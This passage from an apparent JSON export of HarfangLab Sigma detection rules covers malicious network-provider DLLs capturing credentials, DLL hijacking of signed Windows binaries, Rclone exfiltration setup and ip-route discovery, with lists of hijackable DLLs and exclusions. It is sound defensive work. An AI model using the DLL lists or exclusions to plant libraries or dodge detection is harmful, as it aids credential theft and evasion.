(x86)\\Citrix\\Online 
Plugin\\x64\\pnsson.dll'\n\n exclusion_ibm:\n Details: '?:\\Program Files (x86)\\IBM\\Client Access\\Shared\\Cwbnetnt.dll'\n\n exclusion_tiworker:\n ProcessImage: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n Details:\n - '%SystemRoot%\\System32\\nfsnp.dll'\n - '%SystemRoot%\\System32\\p9np.dll'\n\n exclusion_iprint:\n Details: '?:\\Program Files\\Novell\\iPrint\\iPrntWinCredMan.dll'\n\n exclusion_tun:\n - Details: '?:\\WINDOWS\\system32\\WLPRNPNT.DLL'\n ProcessImage|endswith: '\\TunPlus\\setup.exe'\n - Details: '?:\\WINDOWS\\system32\\WLPRNPNT.DLL'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\TunLprNP\\NetworkProvider\\ProviderPath'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n Details:\n - '%SystemRoot%\\System32\\ntlanman.dll'\n - '%SystemRoot%\\System32\\davclnt.dll'\n - '?:\\WINDOWS\\SysWOW64\\f5netprov64.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b713fdb6-4c07-4d42-ae5c-44b619b0a4d5",
"rule_name": "Network Provider Installed",
"rule_description": "Detects the installation of a new Network Provider.\nNetwork provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.\nAdversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.\nYou may use the Get-NetworkProviders.ps1 script in the rule's references to list all registered network providers. It is recommended to determine if they are legitimate.\n",
"rule_creation_date": "2023-08-08",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b728c5bc-b31e-4562-8186-147846992e1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591967Z",
"creation_date": "2026-03-23T11:45:34.591971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasphone.yml",
"content": "title: DLL Hijacking via rasphone.exe\nid: b728c5bc-b31e-4562-8186-147846992e1c\ndescription: |\n Detects potential Windows DLL Hijacking via rasphone.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasphone.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\connect.dll'\n - '\\credui.dll'\n - '\\dui70.dll'\n - '\\eappcfg.dll'\n - '\\iphlpapi.dll'\n - '\\netsetupapi.dll'\n - '\\netshell.dll'\n - '\\rasgcw.dll'\n - '\\rtutils.dll'\n - '\\sspicli.dll'\n - '\\twinapi.dll'\n - '\\xwizards.dll'\n - '\\xwtpw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 
'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b728c5bc-b31e-4562-8186-147846992e1c",
"rule_name": "DLL Hijacking via rasphone.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasphone.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b728f2c6-97c2-49a1-8620-a424f5d582d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610831Z",
"creation_date": "2026-03-23T11:45:34.610835Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610842Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
"https://attack.mitre.org/techniques/T1567/002/",
"https://attack.mitre.org/software/S1040/"
],
"name": "t1567_002_rclone_configuration_created.yml",
"content": "title: New Rclone Configuration Created\nid: b728f2c6-97c2-49a1-8620-a424f5d582d9\ndescription: |\n Detects the creation of a new Rclone configuration file.\n Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.\n It is recommended to investigate the process for suspicious activities and search for any cybercrime-related activities on other hosts.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\n - https://attack.mitre.org/techniques/T1567/002/\n - https://attack.mitre.org/software/S1040/\ndate: 2021/09/30\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1048.002\n - attack.t1048.003\n - attack.s1040\n - classification.Windows.Source.Filesystem\n - classification.Windows.Tool.Rclone\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|startswith: '?:\\Users\\\\*\\.config\\rclone\\'\n condition: selection\nlevel: low\n# level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b728f2c6-97c2-49a1-8620-a424f5d582d9",
"rule_name": "New Rclone Configuration Created",
"rule_description": "Detects the creation of a new Rclone configuration file.\nRclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.\nIt is recommended to investigate the process for suspicious activities and search for any cybercrime-related activities on other hosts.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.002",
"attack.t1048.003",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7865333-71e3-4f99-be6c-df2db775b39d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.541106Z",
"creation_date": "2026-03-23T11:45:34.603491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603498Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-route.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_route.yml",
"content": "title: IP Route Execution\nid: b7865333-71e3-4f99-be6c-df2db775b39d\ndescription: |\n Detects the execution of the IP route utility to display the routing table.\n Attackers may use it during the discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-route.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' r' # route\n ParentImage|contains: '?'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' add'\n - ' change'\n - ' replace'\n - ' delete'\n - ' flush'\n - ' get'\n - ' restore'\n - ' rule'\n\n exclusion_openvpn:\n - ProcessImage: '/usr/sbin/openvpn'\n - ProcessParentImage: '/usr/sbin/openvpn'\n\n exclusion_avahi:\n ParentCommandLine:\n - '/bin/sh /etc/network/if-up.d/avahi-autoipd'\n - '/bin/sh /etc/avahi/avahi-autoipd.action *'\n - '/bin/sh /usr/lib/avahi/avahi-daemon-check-dns.sh'\n\n exclusion_i3status:\n ParentImage: '/usr/bin/i3status-rs'\n\n exclusion_puppet:\n - ParentImage:\n - '*/puppetlabs/puppet/bin/ruby'\n - '*/puppetlabs/puppet/bin/facter'\n - ParentCommandLine:\n - '/bin/sh /opt/puppetlabs/bin/facter --puppet --json'\n - '/opt/puppetlabs/server/apps/puppetserver/puppet-server-release.jar'\n - '/usr/bin/ruby /usr/bin/puppet agent *'\n - '/bin/sh /opt/puppetlabs/bin/puppet *'\n - '/usr/bin/ruby /usr/bin/facter *'\n - GrandparentImage:\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/opt/puppetlabs/puppet/bin/facter'\n - GrandparentCommandLine: '/usr/bin/ruby /usr/bin/puppet agent *'\n\n exclusion_facter:\n - ParentImage: '/usr/bin/facter'\n - ParentCommandLine:\n - 'sh -c 
/usr/bin/facter 2>/dev/null'\n - '/usr/bin/ruby /usr/bin/facter'\n - '/usr/bin/ruby /usr/bin/facter --*'\n\n exclusion_insights:\n CommandLine: '/sbin/ip route show table all'\n ParentImage: '/usr/bin/timeout'\n\n exclusion_insights_client:\n ParentCommandLine:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py *'\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py *'\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_ocsinventory1:\n ParentCommandLine|startswith:\n # /usr/bin/perl /usr/bin/ocsinventory-agent --force\n # /usr/bin/perl /usr/sbin/ocsinventory-agent --wait 100\n - '/usr/bin/perl /usr/bin/ocsinventory-agent'\n - '/usr/bin/perl /usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl /usr/local/bin/ocsinventory-agent'\n exclusion_ocsinventory2:\n GrandparentCommandLine|startswith:\n # /usr/bin/perl /usr/bin/ocsinventory-agent --force\n # /usr/bin/perl /usr/sbin/ocsinventory-agent --wait 100\n - '/usr/bin/perl /usr/bin/ocsinventory-agent'\n - '/usr/bin/perl /usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl /usr/local/bin/ocsinventory-agent'\n\n exclusion_hyperv:\n GrandparentImage:\n - '/usr/sbin/hypervkvpd'\n - '/usr/sbin/hv_kvp_daemon'\n\n exclusion_qualys:\n GrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_gitlab:\n - ParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - GrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - GrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_udscan:\n - ParentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n - ProcessAncestors|contains: '|/opt/microfocus/Discovery/.discagnt/udscan|'\n\n exclusion_pacemaker_1:\n CurrentDirectory|startswith: 
'/var/lib/pacemaker/'\n GrandparentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n\n exclusion_pacemaker_2:\n CurrentDirectory|startswith: '/var/lib/pacemaker/'\n ParentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n\n exclusion_pacemaker_3:\n ParentImage: '/usr/libexec/pacemaker/pacemaker-execd'\n\n exclusion_ocsinventory:\n ParentCommandLine: '/bin/bash /etc/cron.*/ocsinventory-agent'\n\n exclusion_ovirt:\n ParentImage|startswith: '/usr/lib/jvm/java-??-openjdk-'\n ParentCommandLine|startswith: 'ovirt-engine '\n\n exclusion_filemaker:\n ParentCommandLine|contains: 'sh -c ip route '\n GrandparentImage: '/opt/FileMaker/FileMaker Server/Admin/FAC/facstart.sh'\n\n exclusion_microk8s:\n Image: '/snap/microk8s/*/bin/ip'\n\n exclusion_oracle:\n ParentCommandLine: '*/tmp/CVU_*_resource/exectask* -getIfInfo*'\n\n exclusion_node:\n ParentImage|endswith: '/bin/node'\n CommandLine:\n - 'ip -6 r'\n - 'ip -4 r'\n\n exclusion_salt:\n ParentCommandLine|contains:\n - '/usr/lib/venv-salt-minion/*/bin/salt-minion*'\n - '/var/tmp/.root_??????_salt/salt-call *'\n - '/usr/bin/salt-master'\n - '/usr/bin/salt-minion'\n - '/usr/bin/salt-call'\n\n exclusion_fogproject:\n GrandparentCommandLine: 'php /opt/fog/service/FOGMulticastManager/FOGMulticastManager'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_openconnect:\n ParentCommandLine: '/bin/sh /usr/share/vpnc-scripts/vpnc-script'\n\n exclusion_glpi:\n GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n\n exclusion_cloudinit:\n ParentCommandLine|startswith: '/usr/bin/python3 /usr/bin/cloud-init '\n\n exclusion_fsecure:\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_google_network_daemon:\n - ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/google_network_daemon'\n - ProcessParentImage: '/usr/lib/google/guest_agent/core_plugin'\n\n exclusion_blueway:\n # /opt/blueway/bw_installeur/blueway-platform_linux_7.0.1-7/vendors/linux/ruby/bin/ruby\n ProcessParentImage: '/opt/blueway/bw_installeur/blueway-platform_linux_*/vendors/linux/ruby/bin/ruby'\n ProcessGrandparentCommandLine|contains: '/install_bw.sh'\n\n exclusion_alertmanager:\n ParentImage: '/usr/local/bin/alertmanager-*'\n\n exclusion_hv_kvp_daemon:\n GrandparentImage: '/usr/lib/linux-tools-*/hv_kvp_daemon'\n\n exclusion_shadow:\n 
GrandparentImage: '/usr/share/shadow-prod/shadow-launcher'\n\n exclusion_agarik:\n ParentImage: '/opt/agarik/vision/bin/vision_client'\n\n exclusion_paloalto:\n - ParentImage: '/opt/paloaltonetworks/globalprotect/PanGPS'\n - GrandparentImage: '/opt/paloaltonetworks/globalprotect/PanGPS'\n\n exclusion_glpi_agent:\n ProcessGrandparentCommandLine: '/usr/bin/perl /usr/bin/glpi-agent'\n\n exclusion_bettercap:\n ParentCommandLine|startswith: '/tmp/bettercap '\n\n exclusion_softtap:\n - ProcessParentCommandLine|startswith: '/bin/bash /usr/sbin/softtap '\n - ProcessGrandparentCommandLine|contains: 'softtap'\n\n exclusion_zscaler:\n GrandparentImage:\n - '/opt/zscaler/bin/zsaservice'\n - '/opt/zscaler/bin/zstunnel'\n\n exclusion_mk_agent:\n CurrentDirectory: '/usr/lib/check_mk_agent/plugins/'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n\n exclusion_prom_alert:\n ProcessGrandparentImage|contains:\n - '/opt/prom_alert/muse/alertmanager/bin/alert-muse'\n - '/opt/prom_alert/mim/alertmanager/bin/alert-mim'\n - '/opt/prom_alert/mam/alertmanager/bin/alert-mam'\n\n exclusion_domotz:\n ProcessParentImage: '/opt/domotz/bin/domotz_node'\n\n exclusion_ceph:\n ProcessParentCommandLine: '*bin/python* /var/lib/ceph/* list-networks'\n\n exclusion_run-parts:\n ProcessParentImage: '/usr/bin/run-parts'\n\n exclusion_sysconfig:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/sysconfig/network-scripts/'\n\n exclusion_nagios:\n ProcessAncestors|contains: '|/opt/nagiosagent/*/perl/bin/perl|'\n\n exclusion_bladelogic:\n - ProcessImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessParentImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessAncestors|contains: '|/opt/bladelogic/*/bin/rscd_full|'\n\n exclusion_bmc:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n 
exclusion_manageengine:\n - ProcessParentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcagentupgrader'\n - ProcessGrandparentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcagentupgrader'\n\n exclusion_patchmon:\n ProcessParentImage: '/usr/local/bin/patchmon-agent'\n\n exclusion_anydesk:\n ProcessGrandparentImage: '/usr/bin/anydesk'\n\n exclusion_expressvpn:\n ProcessParentImage: '/usr/sbin/expressvpnd'\n\n exclusion_dispatcher:\n ProcessAncestors|contains: '|/usr/libexec/nm-dispatcher|'\n\n exclusion_waagent:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/sbin/waagent'\n\n exclusion_nutanix:\n ProcessParentCommandLine|startswith: '/bin/sh /opt/era_base/era_priv_cmd.sh'\n\n exclusion_ruptime:\n ProcessParentCommandLine|startswith: '/bin/bash /usr/bin/rnet '\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7865333-71e3-4f99-be6c-df2db775b39d",
"rule_name": "IP Route Execution",
"rule_description": "Detects the execution of the IP route utility to display the routing table.\nAttackers may use it during the discovery phase to discover remote systems.\nIt is recommended to investigate other actions taken by this user in their session.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7d32df3-4512-4ec4-b585-77b3563e8764",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097667Z",
"creation_date": "2026-03-23T11:45:34.097670Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097674Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_mstdc.yml",
"content": "title: Phantom DLL Hijacking via msdtc.exe\nid: b7d32df3-4512-4ec4-b585-77b3563e8764\ndescription: |\n Detects a potential Windows DLL search order hijacking via msdtc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MSDTC.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\oci.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_oracle:\n # 51fcd4dad018f86274954ed4e814873b9d149e246278512a9033daefca6113aa\n # a7cda77708394f261cd7e6b9072928dfce5fb9985e7a4071ba24fa59fe537ba6 (trailing \\n at the end of Description in that one...)\n Company: 'Oracle Corporation'\n Description: 'Oracle Call Interface*'\n OriginalFileName:\n - 'Oci.dll'\n - 'oci19.dll'\n\n condition: 
selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b7d32df3-4512-4ec4-b585-77b3563e8764",
"rule_name": "Phantom DLL Hijacking via msdtc.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via msdtc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7e83940-efa3-49f7-9ff6-2e3ebcd998bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589073Z",
"creation_date": "2026-03-23T11:45:34.589077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589085Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_slidetoshutdown.yml",
"content": "title: DLL Hijacking via slidetoshutdown.exe\nid: b7e83940-efa3-49f7-9ff6-2e3ebcd998bd\ndescription: |\n Detects potential Windows DLL Hijacking via slidetoshutdown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - 